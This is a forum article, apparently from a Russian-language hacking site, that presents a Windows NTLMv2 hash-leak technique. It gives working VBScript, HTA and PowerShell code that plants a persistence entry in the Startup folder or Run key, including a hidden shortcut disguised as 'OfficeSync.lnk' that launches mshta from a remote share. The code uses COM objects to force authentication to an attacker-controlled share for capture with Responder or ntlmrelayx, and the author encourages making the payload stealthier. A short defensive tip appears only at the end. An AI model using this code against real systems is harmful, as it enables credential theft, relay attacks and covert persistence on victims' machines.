Статья NTLMv2 Hash Leak via COM + Auto-Execution

[stihl]

Because you still need to drop a script on the target machine (for example, by tricking a user into running a payload or planting it via social engineering), is not considered 0 click so no CVE.

Once you’ve done that, however, it runs entirely in the background and harvests NTLMv2 hashes without any further prompts.

Why It Works​

• Native auto-execution: Leverage login-time paths Windows trusts by default (Startup folder, Run-registry key).
• Built-in COM objects: No exotic payloads or deprecated file types needed — just Shell.Application, Scripting.FileSystemObject and MSXML2.XMLHTTP and more COM objects.
• Automatic NTLM auth: When your script points at a UNC share, Windows immediately tries to authenticate with NTLMv2.

Attack Flow​

1. Plant your script​

• Copy your .vbs (or .ps1) into the user’s Startup folder
• Or add a HKCU\…\Run registry entry

2. Instantiate COM components​

Set sh = CreateObject("Shell.Application")
Set fso = CreateObject("Scripting.FileSystemObject")
Set http = CreateObject("MSXML2.XMLHTTP")

3. Trigger a UNC connection​

sh.NameSpace "\\attacker-server\share"
http.Open "GET", "\\attacker-server\ping", False
http.Send

Capture the hash

• Windows automatically negotiates NTLMv2 when accessing \\attacker-server\…
• Attacker runs Responder, ntlmrelayx, or similar to grab and relay the hash

You can be really creative with your payload:​

Copy-Item .\ntlmleak.vbs “$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup”

<job>
  <script language="VBScript">
On Error Resume Next
attacker = "\\xxxxxxx\leak"

Set sh = CreateObject("Shell.Application")
sh.NameSpace attacker

Set fso = CreateObject("Scripting.FileSystemObject")
fso.OpenTextFile attacker & "\trigger.txt", 1

Set http = CreateObject("MSXML2.XMLHTTP")
http.open "GET", attacker & "\test", False
http.send
</script>
</job>

The VBScript code leverages a combination of COM objects — Shell.Application, Scripting.FileSystemObject, and MSXML2.XMLHTTP-to initiate outbound connections that can trigger NTLM authentication attempts. While this example is written in VBScript, similar techniques can be implemented in other languages that support COM automation.

Get creative — mix and match .lnk, .vbs, .ps1 (or any combination of them) to craft a truly stealthy payload.

$WshShell = New-Object -ComObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\OfficeSync.lnk")
$Shortcut.TargetPath = "mshta.exe"
$Shortcut.Arguments = "\\xxxxxxxxx\leak\leak.hta"
$Shortcut.WindowStyle = 7  # Hidden
$Shortcut.IconLocation = "shell32.dll, 13"
$Shortcut.Save()

<html>
  <head>
<HTA:APPLICATION ID="NTLMLeak" APPLICATIONNAME="NTLMLeak" BORDER="thin" />
<script language="VBScript">
On Error Resume Next
attacker = "\\xxxxxxxxxx\leak"

' Shell COM object (triggers share access)
Set sh = CreateObject("Shell.Application")
sh.NameSpace attacker

' FileSystemObject COM
Set fso = CreateObject("Scripting.FileSystemObject")
fso.OpenTextFile attacker & "\trigger.txt", 1

' MSXML2
Set http = CreateObject("MSXML2.XMLHTTP")
http.open "GET", attacker & "\test", False
http.send

' IE COM nav to UNC path
Set ie = CreateObject("InternetExplorer.Application")
ie.Visible = False
ie.Navigate "file://" & attacker & "\xaml.xaml"

' Cleanup
Set sh = Nothing
Set fso = Nothing
Set http = Nothing
Set ie = Nothing
</script>
</head>
<body>
<h1>Loading...</h1>
</body>
</html>

Why You Care​

• Red-Team POV: Reliable persistence + credential grab in one step — no click-through dialogs, no Office macros.
• Blue-Team POV: Prioritize detection on creation of unexpected Run-keys/Startup scripts and unusual SMB outbound attempts at user logon.

Для просмотра ссылки Войди или Зарегистрируйся